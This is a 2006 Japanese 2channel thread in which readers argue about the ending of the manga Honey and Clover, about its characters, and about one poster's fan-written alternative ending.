119 :花と名無しさん:2006/09/18(月) 20:31:36 ID:???0
>>118
http://comic6.2ch.net/test/read.cgi/gcomic/1150000580/277

無神経で品のない作品に没頭する人はやっぱり
その対象に似てくるもんなんですかね?

120 :花と名無しさん:2006/09/18(月) 20:34:32 ID:???0
>>11
温帯、ナチュラルにこのスレに紛れ込んでそうだな。

121 :花と名無しさん:2006/09/18(月) 20:53:08 ID:???0
御大の中川ブサイクすぎ
羽海野の絵より酷い

122 :花と名無しさん:2006/09/18(月) 21:00:40 ID:???O
>>118
大体アンチスレに限らず押した割に人気出なかった
(映画微妙、アニメ実況の伸びイマイチ、
 原作の後半がファンに不評で本スレがアンチスレ化)ってのはあるだろ。

ここでの議論が不毛で下らないのも客観的に見て明らかで
そんなこと承知の上で馴れ合ってる奴が殆どなのに
そんな空気を微塵も理解してないであろう気の利かないしょーもないレスを
記念カキコに対してするって相当恥ずかしい。


>120
ちょw

123 :花と名無しさん:2006/09/18(月) 21:15:13 ID:???0
ここはアンチが多いみたいだけど私は普通に最終回は感動したけどなぁ
ここって肯定的な意見は言っちゃいけないの?

124 :花と名無しさん:2006/09/18(月) 21:19:33 ID:???0
>>118
いいなーパソコンあってー
私持ってないから羨ましいよー

アンチが少ないのはハチクロが良作だからで
アンチスレの延びの悪さがそれを証明してるよね
私みたいな携帯厨のお馬鹿ちゃんにフォローされても
嬉しくないだろうけど、あなの言いたいことよくわかるわーーー

125 :花と名無しさん:2006/09/18(月) 21:21:18 ID:???0
ID:???0

126 :花と名無しさん:2006/09/18(月) 21:23:07 ID:???0
修よりも、フラッと現れてはわけのわからん言動する森田と、
ストーキングする真山が普通にキモイだろ

127 :花と名無しさん:2006/09/18(月) 21:30:38 ID:???0
>>123
なぜ少数派は書いちゃいけないと思うのかが不明
肯定的でも頷ける内容のレスやそういう流れは過去何回もあった

アンチというよりファンだからこそここまで盛り上がれるんだろうし
やっつけのような仕事に「裏切られた」気がしてしまう部分もあるだろうし
それはまともに文章読んでいけば察しつくでしょ

ただ客観的に見て笑うしかないほどおかしい部分を
無理からフォローするような奴が肯定派に多いだけ
そういうのを「信者」「ヲタ」といい、
こういう生き物は何処へ行ってもウザがられるのが定番

128 :花と名無しさん:2006/09/18(月) 21:49:59 ID:???0
最後まで読みきって、萩尾望都の「10年目の毬絵」思い出した

129 :花と名無しさん:2006/09/18(月) 21:50:52 ID:???0
>>126
真山キモイはこのスレの総意です
森田もオタ以外はキモイと思ってる部分はある

しかしこの二人がキモイことと修がキモいことは何も関係がない
この二人とはまた違うキモさが修にはあるので
正しくは真山も森田も修もキモイ

130 :花と名無しさん:2006/09/18(月) 21:52:23 ID:???O
原作のアンチスレで原作の良さを説いたり
アニメアンチスレで映画のキャストの愚痴こぼしたり
実況や映画スレで気に入らない書き込みを
「キモアニヲタ」「薄っぺら人間」「妬み僻み同人女」呼ばわりしたり


マジでそういうことするのが、信者
まあそこまで酷いのはごく一部だし
ハチクロ信者はすぐ引き下がる分マシだと思うけど
さすがに映画スレで「同人」という言葉を出したのは引いたな…
どんだけ病んでんだよと

131 :花と名無しさん:2006/09/18(月) 21:56:50 ID:???O
>>124 なるほど鋭い意見ありがとう

>>118 ナタリアは?


132 :花と名無しさん:2006/09/18(月) 22:14:29 ID:???O
修はぐに関しては、結末の賛否は置いといて、原田が死んでしまった→青春ストップ→ハマビに残るって状況だとオモタ。
少なくとも作者はそう認識してたんじゃ。
だから、最後の最後にああいう結末を用意しても、作者にとっては別におかしくはない、
修の時間(青春)もまた動き出した、という。


133 :花と名無しさん:2006/09/18(月) 22:15:37 ID:???0
>>129
確かに関係ないな すまん
それじゃあマトモなやつっているのかな?

134 :花と名無しさん:2006/09/18(月) 22:31:45 ID:???0
>>132
真山がリカを救ってくれなければ修は動けなかったかもね

いや、はぐが怪我した時点でそんなこたあ飛ぶか

135 :花と名無しさん:2006/09/18(月) 22:35:38 ID:???0
真山キライで真山の出てるとこは流し読みしちゃうもんだから
真山が修の青春復活を喜んでるのにこのスレ見るまできづかなかった。
頬を赤らめてフルフルとキモイ顔してたからなにかリカといいことでも
あったのかと思ってたよ。

なんか最後にきていきなり真山は修の唯一の理解者みたいな扱いに
なってたんだね。
ストーカーは真山の代名詞だと思ってたけどもっと上手がいたんだな・・・
そうゆう意味でも修は真山の「先生」だったわけか・・・

136 : ◆E6wyrLUoXk :2006/09/18(月) 22:37:34 ID:???O
甘酸っぱいカクテルで、くにゃりと酔いつぶれた山田さんが
時折洩らす熱くて甘くて鼻にかけたような吐息を
胸いっぱい吸い込んで吐き出したくない

137 :花と名無しさん:2006/09/18(月) 22:48:58 ID:???0
はぐの大事なものランキング

自分の才能>>森田の才能>>あゆ>修の包容力>>森田>みどり>>>竹本

138 :花と名無しさん:2006/09/18(月) 22:55:58 ID:???0
>>森田>みどり>>>お菓子のオマケ>>>>>竹本

139 : ◆E6wyrLUoXk :2006/09/18(月) 22:56:25 ID:???O
女は愛するより愛されてた方がいいんだよ
女は三日で馴染むともいうしな
はぐもリカも山田さんも、結局みんな愛されてる
愛された女が勝ち、だから
はちくろは女の願望の王道なような気がしていたが、
少女漫画的には相思相愛の方がいいの?
他の読まないならわからん

140 :花と名無しさん:2006/09/18(月) 22:58:17 ID:???O
>森田>>みどり>>>>>>セロハンテープ>>>>>>竹本

141 :花と名無しさん:2006/09/18(月) 23:06:02 ID:???0
森田>>みどり>ホイップちゃんベル>>修>>もちっこクリアタイプ>>>>竹本≧もちっこキング

142 :花と名無しさん:2006/09/18(月) 23:10:02 ID:???0
竹本カワイソス

恋とか青春とか、学生時代の楽しい時間が過ぎ去っていく切なさ
みたいなものを描いているのもこの作品のヨイところだ

「今、一番自分に必要な何かを選び取る」
なんかちょっとシビアかもしれないけど、この結末が一番腑に落ちる
これでもし最後に、森田&はぐ、真山&山田、修&リカ のカップリングが成立してたりしたら、俺的には嫌だった

143 :花と名無しさん:2006/09/18(月) 23:15:57 ID:???0
>>88
同意。同業者の名前をわざと呼ばない理由も皮肉だし米搗きバッタ呼ばわりもそう。
公にされるお祝いメッセージにちやほやされない不満を練りこんで
自分以外の漫画家を持ち上げる人たちを威嚇してるみたい。
漫画家や編集者の目に触れることになればそれで満足だったりして。

144 :花と名無しさん:2006/09/18(月) 23:32:41 ID:???0
>>142
森田&はぐはともかくこの期に及んで真山&山田、修&リカはありえなくね?

145 :花と名無しさん:2006/09/18(月) 23:37:59 ID:???0
でも修はぐができたんだから真山&山田も修&リカも
やろうと思えばできたんだろうなとは思う
どっちに転んでもブーイングはあるだろうけどね

146 :花と名無しさん:2006/09/18(月) 23:45:35 ID:???0
どっちにしろ竹本はフラレっぱなしの青春キングだけどな!

147 :花と名無しさん:2006/09/18(月) 23:50:24 ID:???0
ありがとう、ハチクロ
この漫画の影響を受けて、自分さがしに出かけて
その話を女の子にしたら、変な人だって言われた
ありがとう

148 :花と名無しさん:2006/09/18(月) 23:51:17 ID:???0
>>147
相当キモイよ、あんた
自覚しないと将来酷い目にあうと思うよ
一言忠告しておく

149 :花と名無しさん:2006/09/18(月) 23:52:45 ID:???O
>>135
俺も修司と真山が一緒に いるシーンはとばしてる キモすぎるつうか
特に真山が 自分は先生と一緒で大人〜 竹本や山田達子供組とは違うんだ!!って言ってるみたいでムカつく
とりあえず 寒いダジャレ2人で言ってるシーンや祭りシーン、将棋シーンは完全にスルーして読んでる
つか削除したいw

150 :花と名無しさん:2006/09/18(月) 23:54:41 ID:???O
>>148
すでに女性に変な人だって言われたんだから 自覚はしてるだろwショックだろ

151 :花と名無しさん:2006/09/18(月) 23:57:34 ID:???0
>>148
そういうことを自覚してないから自覚するために自分さがしに出かけました
最終的には何も見つかりませんでした

とりあえずただひたすら自転車で行けるところまで漕ぎ続けました
その話をしたら、自転車でそんな距離漕ぐなんて信じられないって言われて
別の子には「変だよ」って言われて、もう一人の子が「あー言っちゃったw」って感じ

ありがとう

152 :花と名無しさん:2006/09/19(火) 00:00:45 ID:???0
>>151
釣られてるかもしれないけど、正直に答えよう
その発想がキモイ
なよなよしてキモイ
その女の子はできうる限りの努力をしてオブラートに包んでくれたんだ、やさしい子だ
感謝しなさい

153 :花と名無しさん:2006/09/19(火) 00:04:52 ID:???0
え?大学生にとって自分探しに自転車旅行はかなりデフォでしょ?
普通にみんなやってたぞ?

154 :花と名無しさん:2006/09/19(火) 00:10:15 ID:???0
>>152
でもまあ、自分さがしの甲斐もあって、もう最初から馬鹿だったので
変って言われてもそんなにショックじゃなかった自分もいたりするわけです
なんつーか、ある意味、森田さんと同じポジションな感じです
元々まじめなところで馬鹿やってみんな笑わせてたので、その話したところで
オプションが追加されただけ、みたいな

155 :花と名無しさん:2006/09/19(火) 00:11:51 ID:???0
>>153
みんなやってない

156 :花と名無しさん:2006/09/19(火) 00:13:11 ID:???0
俺も竹本と同じような事やったがある。
自分探しの旅じゃなくて、子供時代の「どこまで行けるのか〜」ってほう。
5時間走ったら来た道を帰ってくっていう10時間くらいの事を。

ちなみにハチミツとクローバーを読む前ね。

157 :花と名無しさん:2006/09/19(火) 00:13:59 ID:???0
>>154
ますますキモイ、というかキモイっていう軽いコトバでは表現できない

158 :花と名無しさん:2006/09/19(火) 00:17:32 ID:???0
人間、憂鬱になると、なんかアホなことがしたくなるもんだよ。
恋人ができてしあわせな友人、趣味に打ち込んで楽しそうな人。
自分には何もない。
そんな状況だと、ひきこもるか、あてもなくドライブするかじゃない?

ひきこもりと同列なんだよ、自分探しは。NEET予備軍のやることだからキモくて当然。

159 :花と名無しさん:2006/09/19(火) 00:18:18 ID:???0
森田的ポジションとかのうのうと言えることに悪寒を感じるんだが

160 :花と名無しさん :2006/09/19(火) 00:20:48 ID:???0
小学生の頃なら
夏休みにやったなあ 夜明け前に出て行きに12時間、帰りは
もう精も根も尽き果てて、自転車乗り捨てて電車で帰った。
翌日電車で自転車を取りに行って、足が何度もつりながら、
家までの途中までこいで、またそこで乗り捨てて・・・
結局まる3日かかった。
教訓。馬鹿なことはやるもんじゃない。

161 :花と名無しさん:2006/09/19(火) 00:22:43 ID:???0
>>155
まじで?夏になったら大量に国道とか走ってるじゃん

162 :花と名無しさん:2006/09/19(火) 00:34:45 ID:???0
それは自分探しじゃなくて
単なる自転車好きのロードレーサーなんじゃないの

163 :花と名無しさん:2006/09/19(火) 00:37:06 ID:???0
どうみても貧乏学生の貧乏旅行です

164 :花と名無しさん:2006/09/19(火) 00:43:06 ID:???0
まあほとんどの奴はやってないって

165 :花と名無しさん:2006/09/19(火) 00:48:05 ID:???0
楽しそうだ

166 :花と名無しさん:2006/09/19(火) 00:53:19 ID:???0
自分を探しはしないけど消防の時に
>160みたいなことはやったよ。

現実で自分探し…う〜ん。漫画だけでいいや

167 :花と名無しさん:2006/09/19(火) 00:55:05 ID:???0
他人からすれば「何の意味があんの?キモイよ」ってなことでも
その人たちによって事情があるんだからキモイって言うのはよくないと思う。

168 :花と名無しさん:2006/09/19(火) 00:57:18 ID:???0
ていうかここって半分アンチスレだよね
大体の人が半分かそれ以上不満をもってて
あーだこーだ臭キモイはぐうざいだの言ってる
私も不満はたくさんあるけど、部分的には良い所もあったかなぁ
自分探しって言葉自体キモイと思うけど、竹本の自転車の旅は面白かった


169 :花と名無しさん:2006/09/19(火) 00:59:30 ID:???0
>>153
やったよw自分探しなんて名目じゃなかったけど
楽しかった

170 :花と名無しさん:2006/09/19(火) 01:02:04 ID:???0
自転車旅行は楽しいよ
思わず歌をうたってしまうのも本当
おなじ自転車旅行経験者の話を聞いたら、不思議とみんなそう言うんだわ
最初にハチクロ読んだ時はこの作者が女のくせに自転車ビンボー旅行をリアルに描けてるんでびっくりした

171 :花と名無しさん:2006/09/19(火) 01:02:19 ID:Vn/qFW7L0
羽海野の本名下の名前は「ひろみ」なの?

森博嗣のサイン会によしもとばななと膿野が二人で来た、と森が
ウェブで書いてるんだけど、ばななのウェブでは「友達のひろみちゃんと行った」
と書いてある。

172 :花と名無しさん :2006/09/19(火) 01:10:01 ID:???0
自転車旅行(半日〜数日間)
は男性なら小学生〜高校生の間に
かなりの人が経験あると思うよ。

173 :花と名無しさん:2006/09/19(火) 01:11:26 ID:???0
はいはい

174 :花と名無しさん:2006/09/19(火) 01:40:53 ID:???0
とりあえずここのスレには自分と考えが違う人間を
罵倒する癖があるということが分かった。

175 :花と名無しさん:2006/09/19(火) 01:52:49 ID:???0
ウミノさんありがとう。

176 :花と名無しさん:2006/09/19(火) 02:00:47 ID:???O
>>174
とりあえずここのスレには


「ここのスレには自分と考えが違う人間を罵倒する癖があるということが分かった」


とか言い出す、
非差別意識に満ち、他人に期待しすぎ、期待に応えないと卑屈になり、

どのスレでもウザがられる可能性のあるレスと
それに対するどのスレでも起こりうる反応を
このスレ特有の物であるかのようにいい、

スレの住人像を画一化する、作品の世界観に近い感覚の人間が集まりやすい
ということが改めてよくわかった。

177 :花と名無しさん:2006/09/19(火) 02:04:54 ID:???0
>176
何か上手い事言ったったみたいに書いてるけど、携帯から必死だなお前。

178 :花と名無しさん :2006/09/19(火) 02:10:14 ID:???0
>>177
どこで携帯ってわかるの?改行?
ID?

179 :花と名無しさん:2006/09/19(火) 02:16:29 ID:???O
大学生が自転車で自分探しに共感した奴いたんか‥
あそこはもう完全に「漫画ですからw」でスルーするしかない部分だと
勝手に思いこんでいたから吃驚した

とりあえず趣味で自転車旅行とか子供の頃の無茶話と
一緒にできるようなものじゃない気はする


>>174
2ちゃんで自分と違う意見を罵倒したとかされたとか
そういうことのみを書き込む奴久しぶりに見た

180 :花と名無しさん:2006/09/19(火) 02:20:00 ID:???0
このスレ見てると色んな意見があって面白いし、
それぞれの意見を否定するつもりとかは全然ないんだけど、
なんか自分なりに補完したくて、「じゃあどういう展開だったら自分は納得したかな」っていうのを書いてみた。
晒してみる。

http://www.uploda.org/uporg520070.txt.html

181 :花と名無しさん :2006/09/19(火) 02:20:43 ID:???0
>>179
でも、気持ちはわかるよ。
自転車放浪の。
知り合いで、失業中に東海道全部歩いた人とかいるし。

182 :花と名無しさん:2006/09/19(火) 02:31:23 ID:???O
自転車放浪って、海外放浪とか、最近だと沖縄に行っちゃう本土人みたいなもん?
なんつーか、自分探しオプションその1みたいな。
ま、端から見たら意味がないとかキモいかもしらんが、何もできずに何もしない奴よりはマシなんじゃね?




と言ってみるtest。


183 :花と名無しさん :2006/09/19(火) 02:35:46 ID:???0
>>180
とりあえず読みました。
あり得た話ではあるけど、多分はぐをそこまで突き放すことは
作者にはできないから、やっぱり無理かな。
あれはあくまで御伽噺なんだと思う。
めでたし、めでたし、で終わってしまう御伽噺。

184 :花と名無しさん:2006/09/19(火) 02:59:16 ID:???0
>>180
お前キモイよ。
羽海野よりもキモイ。
あれは金のためにやってるけど、お前はマジでやったんだろ?

漫画で3ページ程度描いてあるだけだと思ったら
文章で青臭いことを永遠と書いてあるから寒気がした。

185 :花と名無しさん:2006/09/19(火) 03:00:41 ID:???0
また出たキモイ。このスレ、キモイ好きだねぇ。
読まなきゃいいのに、読んでわざわざキモイ言うところが面白い。

186 :179:2006/09/19(火) 03:12:22 ID:???O
>>181
うん、まあういう機会自体を否定する気はないけど
個人的に余計な部分という印象だったからというのもあってね

つうかこの漫画はいつも、どこか「ごっこ」に見えるんだよな
青春ごっこ、友情ごっこ、恋愛ごっこ、芸術ごっこ、
天才ごっこ、苦悩ごっこ、不幸ごっこ、保護者ごっこ

漫画だし初期の頃は気にならなかったけど
そういう粗い自己陶酔の押し売りみたいな描かれ方が
気になり出したきっかけが竹本一人旅だったと

ほぼ全員一方的な態度・自己中な性格で統一されている気がしてきて
後半は誰かが傷ついても感情移入できなくて
何かもうウジウジウダウダ鬱陶しいなあお前等ーとっととやれや
みたいになってきた

187 :花と名無しさん:2006/09/19(火) 03:16:56 ID:???O
>>185
もし冗談や煽り目的じゃなく本気なら
もうあんまりネット自体やらない方がいいよ

188 :花と名無しさん:2006/09/19(火) 03:43:04 ID:???O
>185
確かに執拗だし下品だがキモイキモイ言ってる奴って同一だろ。

違うにしてもどの板やスレからも
キモい言われるか見なかったことにされる事必至の内容なのに
何をそんなにはしゃぐ必要があるのか。

189 :花と名無しさん:2006/09/19(火) 06:40:50 ID:???0
真山の言動がわからない
修の恋愛宣言?を聞いてすごく喜んでてその後あゆに
「こうなるようにしか流れてなかった気がする」と
言っていたけど同時に「はぐは森田を好きだと思う」
ってのはなんなんだろう?

修がはぐに恋愛感情をもちつつはぐと恋人関係になれないまま
そばでサポートすることを祝福してるの?
それともはぐは一番好きな森田を諦めて(芸術の為に)修で妥協
したことを祝福してるの?
それとも単純に修が恋愛を始めたのを喜んでるだけ?(結果はともかく?)

わけがわからない。誰か解説頼む。

190 :花と名無しさん:2006/09/19(火) 06:58:36 ID:???0
作者自身、あまりキャラの人物像を捕らえられてないんじゃないかな。
女性マンセーが先で、それに都合のいいノリのいい行動と台詞を
それぞれに当てはめてる感じがする。
だから設定だけじゃなくいろんなところで突っ込み満天なんだよな。
森田ならあの時こうは言わないだろ、竹本なら・・真山なら・・・って感じ。


191 :花と名無しさん:2006/09/19(火) 07:31:12 ID:???0
>142
竹本がかわいそうなのは恋が実らなかったことより、
あのグループ以外に大学生活でできた友達残ってなさそうなところだ。

森田とはぐはもともと普通のキャンパスライフみたいなものを
望むようなタイプでもなさそうだからいいけど、
竹本はうっかりあのグループに入ったばかりに世界が広がらなかった感じがする。
真山みたいにバイトして人間関係作ったり合コンしてたりとかないし、
山田みたいにグループ外に友達がいたような雰囲気もないし。

あのグループとだって、はぐと付き合えてたらそこを軸に交流が続いただろうけど、
それもないからフェイドアウトしそう。ずっと「蚊屋の外」で終わっちゃった。

192 :花と名無しさん:2006/09/19(火) 07:39:37 ID:???0
確かに、
まともな友達がいなかった、
というのは可哀想というより哀れだな。

193 :花と名無しさん:2006/09/19(火) 07:51:56 ID:???0
>>191
納得。

ますます竹本が不憫だ。
花本先生&はぐグループに入らなかったら
竹本には別の青春があったかもしれないのに。


194 :花と名無しさん:2006/09/19(火) 07:56:42 ID:???0
竹本バイトはいっぱいしてたよね?
そこで友達作れてたかはわかんないけど。

195 :花と名無しさん:2006/09/19(火) 07:57:37 ID:???0
少女漫画板の摂理スレで
カルト宗教に勧誘されるタイプは
「田舎から出てきた純朴で人の良い大学生で
 大学でまともな友達ができなかったタイプ」
のようなことが書かれていたんだが
今、それにバッチリ当てはまるマンガのキャラとして
竹本を思い出した。

さらに付け加えると、「自分探し」をしてしまうようなタイプも
カルト宗教のいいカモだということだ。

竹本…(つ;Д`)

196 :花と名無しさん:2006/09/19(火) 08:17:49 ID:???0
>>195
そういえばこないだ喫茶店で地味で化粧っ気のないいかにも
「田舎から出てきて学校で友達ほとんどいません」ってカンジの
女の子が派手なオバハンに囲まれてなにやら契約書にサインさせ
られそうになってたな。
オバハン達「あなたみたいな素敵な人とお知り合いになれて嬉しいわ」
とか「あなたほんとに目がキラキラしてるわ!」とか誰が聞いても
お世辞としか思えないこと言ってたけど女の子嬉しそうだったな。
でも「あまりお金が・・・・」となかなかしぶとくサインしないでいたら
どこから沸いてくるのかどんどんオバハンが増えてきて女の子囲んでた。
どうなったか見届けなかったけど怖かった。 スレ違いスマソ

197 :花と名無しさん:2006/09/19(火) 08:28:33 ID:???O
ここだと自転車で一人旅はありえないみたいに言われてるけど
友達に一人でオーストラリア一周自転車旅行行ったり
インドに自分探し?しにバックパッカー行ったり
そういう男の子いる自分はそこまで気になる話ではなかったよ
大学も仲いいグループ以外と遊んだりも合コンもなかったから
竹本が特別かわいそうとも思わないや…
同い年で童貞なんて結構いるしね。

198 :花と名無しさん:2006/09/19(火) 08:41:01 ID:???0
>>197
>自転車で一人旅はありえない

叩いてるのは一部の人だと思ったよ。
前にハチクロの自転車で一人旅の話題が出た時は
「わかる」という意見(ほとんどが男性)が多く出てたよ。
ロードレーサーでそういう男性はたくさんいるよね。
女性だと野宿は危険が多すぎるから無理だけど。

ただ「自分探し」ということに関してはイタタと私も思う。
インドに自分探し行っちゃう人も内心は「イター」と思う。


199 :花と名無しさん:2006/09/19(火) 08:51:08 ID:???O
そっかー。
インドはね、やりたいことがわからなくなって
自分ってなんなんだろう?とか考えだしちゃって自分見極めるためにいったらしいよw
今は教師になってる。
大学生ってまだまだ純粋だからそういう人って普通にいるんだよね
男の子のが夢見がちだわ

200 :花と名無しさん:2006/09/19(火) 09:11:29 ID:???0
「自分探しの旅してきたんだ」
「キモー」
リアルでこう言われる人って自分探しすること以前に本人にキモイと思わせる何かがあったんじゃないの?
旅した結果その人が成長してるようなら話を聞いてもキモイとは思わない気がする

201 :花と名無しさん:2006/09/19(火) 09:24:03 ID:???O
言い方にもよるのかなぁ?
「俺自分探しの旅してきたんだぜ!」
こんな風に自信満々だったらあれれって思うけど…
でも20ちょいならまだまだありそうなんだけどね
そいや女の子でも自分を見つけたいってボランティアでアフリカ行った子もいたな・・・


202 :花と名無しさん:2006/09/19(火) 09:25:55 ID:???0
>>200
全くそうだね。
で、スレで竹本が叩かれ気味なのはアレじゃないか?
自分探ししてきたのに、人間的にあまり成長してなかった(=むしろ退化)からじゃないか。


>>180
乙。
せっかく一生懸命書いたようだから最後まで読んだけど
あなたの理想最終回ストーリーに私は
全くといっていいほど共感できなかった。ごめんね。
ベッドシーンが出てくるから、エロパロ板ハチクロスレに投下してみたら?
むこうでも理想最終回ストーリーを投下してる人達はいたよ。
むこうではよっぽどのことがないと叩かれないし
共感してくれる人もいると思うよ。



203 :花と名無しさん:2006/09/19(火) 09:29:53 ID:???0
竹本が自分探しした時って、そもそも竹本が
普通の精神状態じゃなかったじゃないか。
留年になったり、卒業制作がダメになったり
最大の原因は就職がダメになったりなどで
抜け殻のようになって、フラフラとママチャリで遠くに行ってしまった。

ロードレーサー用の自転車に乗って
きちんと準備して旅に行く者とは違う。
そういう者は、竹本タイプではなく
ローマイヤ、原田、竹本母の再婚相手…
みたいな男だ。

204 :花と名無しさん:2006/09/19(火) 10:15:43 ID:???0
>>180私も読んだよ〜
うーんこういうのってダメだ…
なんだかんだいってハチクロのラストは万人ウケするものなんだって
実感になったとゆうか。
少女マンガらしくさわやかなノリで最後は終わってよかったと思う。

>>203
放浪しにいっちゃうのってそういう時じゃない?>普通の精神状態じゃなかった


205 :花と名無しさん:2006/09/19(火) 10:36:19 ID:???0
将来何をしたいのかも見えないし、今現在暇なのにすることもない。
そんな暇人が「自分探し」と称して(称さないこともある)
ふらっと放浪したりするケースは幾つか知ってますので
竹モッツみたいなのはモラトリアム学生によくある話ですよね。

>>180
読んだ。
ラストをどういう風に導いて欲しかったのかは、なんか分かる。
基本的には君と考えが似てるのかもしれない。
けど、ここまでいくともうドロドロ過ぎだよね。


206 :花と名無しさん:2006/09/19(火) 10:47:06 ID:???0
>>205
そうそう。
変な宗教入ったり自己啓発セミナー入っちゃうのもいるよね。
タケモトて一歩間違えてたらそっち系いってそw

207 :180:2006/09/19(火) 11:24:12 ID:???O
冷静な感想が多くて嬉しかったです。
感想読んでて、自分は六巻から先の展開のたたみ方によっぽど不満を持ってたんだなあ…としみじみ思った。
自分的に避けたい展開が全部通っちゃったって感じだったんだよね。

でも確かに「綺麗なものを綺麗なままに」っていうのはハチクロの一番の魅力だし、
(いくら勝手に付け足したオチ話とはいえ)最低限そこは踏まえないとハチクロの世界ではなくなってしまうんだなあ。てのはよく分かった気がする。

勉強になったよ。
>>183>>202>>204>>205さんありがとう。

208 :花と名無しさん:2006/09/19(火) 11:55:12 ID:???O
長期自転車旅行してた人は、大学の時ちらほらいてめずらしかなかったか
何割かは自分探しだったのかな。
旅行好きand達成好きだと思ってた。日本一周とか全県制覇とか。
それが自分探しなのか?

でもしたり顔のバックパッカーになんなくてよかったよ、竹本。
(バックパッカーがみんなしたり顔とは思ってませんよ、念の為。)

209 :花と名無しさん:2006/09/19(火) 12:08:20 ID:???0
10巻よみました。
はぐと修のことで色々思うところはありますがそれはさておき
私は修が大学にいつづけたのが原田の呪いのように描かれて
いたのがショックでした。
花本先生は浜美がすごく似合ってて学生との交流を描いた箇所を
とてもほほえましく思って読んでいたのですが、りかや丹下先生
まで花本先生が出て行くことを泣いて喜ぶなんて過去のストーリ
から想像もしてなくてショックでした。

あんなに楽しそうな学園生活だったのに原田の呪いだったとは…orz

210 :花と名無しさん:2006/09/19(火) 12:20:38 ID:???O
>>209
それをなぜ原田の呪いととるんだ…
大学での教師生活は呪いでもなんでもない
ただ原田が死んでから修は進むべき道を迷っていた
時間が止まったまま動けずにいた
という感じでは

211 :花と名無しさん:2006/09/19(火) 12:38:18 ID:???0
>>203
同意。自転車旅行をする=自分探しじゃないよね。
本当の自分がここではなくどこかにあるかもしれないと思っている状態が気持ち悪い。
ちょっとした冒険や趣味で自転車旅行をしている人を気持ち悪いとは思わない。

>>180
>はぐはあの時、自分が失ったものばかりに気を取られて、それ以外のものは「あって当然」だと思っていた。

わかる。そういう感じに描かれてて萎えたから。
将来を失わないための行動が多すぎて、思いやる言葉も行動も打算に見えて好きになれなかった。
その反面優しい人の好意は無尽蔵に受けられると思っていそうでどこまで無神経なんだと思った。

212 :花と名無しさん:2006/09/19(火) 13:21:39 ID:???0
>>210
「ただ原田が死んでから修は進むべき道を迷っていた
時間が止まったまま動けずにいた」
ということを、209はわかりやすく「原田の呪い」のようにまとめたのでは?

自分も
「花本先生は
 原田の呪縛から解き放たれて
 よかったねー、よかったねー、よかったねー
 青春だー青春だー青春だー」
とハチクロ世界の「大人組」がマンセーしてるみたいで
気持ち悪かった。



213 :花と名無しさん:2006/09/19(火) 13:32:51 ID:???0
>>180
読んだよー。
↓厨な感想でスマン。



あなたのストーリーだと
ハチクロ世界のメインの登場人物達の多くがまだ
モラトリアムを引きずっていたままなのに
宮大工として成長して立派になった竹本がまぶしかった。








214 :花と名無しさん:2006/09/19(火) 13:55:40 ID:???0
個人の妄想披露なんて同人板にでも行ってやってくれないか。

215 :花と名無しさん:2006/09/19(火) 14:02:10 ID:???0
信者が
「私はハチクロの8〜10巻にも納得いったし
 最終回にも感動したんだけど
 ハチクロに文句つけてる人達は
 ハチクロがどういう結末だったら納得いったの?」
としつこく聞くから、真に受けて投下した人がいたんじゃねーの?
信者って本当にイヤな奴だな。ミクシィにでも行ってろよ。


信者のよくあるプゲラな書き込み。

1「ハチクロに文句言う人は、どんなマンガ読んでるの?」
2「ハチクロに文句言う人は、どんな結末なら納得いくの?」
3「ハチクロに文句言う人は、才能と創作能力がない奴でしょ?」
4「元同人女ではじめて成功したのが
 羽海野さんだからって、才能のない同人女どもが
 羽海野さんをねたんで叩いてるんでしょ?」



216 :花と名無しさん:2006/09/19(火) 14:51:47 ID:???0
感想ならまだしもSS投下はいただけない。
オナニー公開はやめて欲しい

217 :花と名無しさん:2006/09/19(火) 15:01:45 ID:???0
>>216
同意。
どうしても公開したいなら、自分でサイトつくって
そこに誘導すればいいのにね。

218 :花と名無しさん:2006/09/19(火) 15:02:45 ID:???0
SS投下した人は2ちゃんに書き込まないでウプローダにウプしただけじゃないか。

219 :花と名無しさん:2006/09/19(火) 15:07:43 ID:???0
>>218
2ちゃんに晒してる時点で、2ちゃんに書き込んでるのと同じかと。

220 :花と名無しさん:2006/09/19(火) 15:11:49 ID:???0
みんな心が狭い、器が小さい

221 :花と名無しさん:2006/09/19(火) 15:17:58 ID:???0
別にいろんな感想があっていいじゃん
そっちの方が面白いしwww
アンチもマンセーもどんどん書き込もう!
釣られ釣りあっていけばいい
それが2ちゃんクオリティー

222 :花と名無しさん:2006/09/19(火) 15:24:44 ID:???0
180は感想じゃねーじゃん。ただのオナニー公開。

223 :花と名無しさん:2006/09/19(火) 15:31:49 ID:???0
>>180はもしかして住人を試してるんじゃないのか?
このスレでも度々出てる原作への不満が全部伏線になってる気がするんだが…

224 :花と名無しさん:2006/09/19(火) 15:38:52 ID:???0
>>222
確かにあれは感想ではないな

225 :花と名無しさん:2006/09/19(火) 15:42:41 ID:???0
住人を試してどうするのさ

226 :花と名無しさん:2006/09/19(火) 15:48:46 ID:???0
おかしな信者がどういう結末なら満足するのか煽ってたから
それに答えたんじゃないの?
ここに長文書き込まなかったのはいい判断だと思ったけど。
日向のようなハチクロから落ちた影の部分って感じ。
ウミノさんが天然過ぎて気付かない負の部分をよく見てると思った。

227 :花と名無しさん:2006/09/19(火) 15:50:36 ID:???0
180は陶酔してるっぽいところががなんとも…
ウミノたんの漫画の方がいいや

228 :花と名無しさん:2006/09/19(火) 15:56:49 ID:???0
粗探ししか出来ないのかね?

229 :花と名無しさん:2006/09/19(火) 16:01:00 ID:???0
別にSSで答える必要ないじゃん。
何が直接書き込まないのがいい判断だよ。
スレ違いの180のSSの感想が垂れ流されてるじゃん。

230 :花と名無しさん:2006/09/19(火) 16:03:22 ID:???0
180みたいなのは個人サイトかそれこそエロパロでやったらいいよ。

231 :花と名無しさん:2006/09/19(火) 16:12:40 ID:???0
お前ら>>180が大好きなんだな

232 :花と名無しさん:2006/09/19(火) 16:15:20 ID:???0
電波が強すぎた

233 :209:2006/09/19(火) 16:22:54 ID:???0
>>210
なんていうんだろう、うまく表現できないんですが花本先生は
好きで大学にいるのだとばかり思っていたしとても似合っていると
思っていたんです。私の勝手な感想ですが。
「それが原田の死後進むべき道を迷っていた」
「時間が止まったまま動けずにいた」
だからから大学にいました。
というのが自分的にショックだったんですよね。

あんなに楽しそうだったのに原田の死後動けずに残ってただけだったのか…と。
はぐがくるまでは半分死に人のような大学生活だったことや、決心がつけば
大学を抜け出したいと思いながら動けずにいただけだった。というのが最後に
なんとも悲しい気持ちになりました。

234 :花と名無しさん:2006/09/19(火) 16:39:49 ID:???O
はぐ連れてきて花本の時間が動きだした所から話始まってるから、
話中は楽しそうな所ばかりなんじゃない?

235 :花と名無しさん:2006/09/19(火) 18:55:51 ID:???0
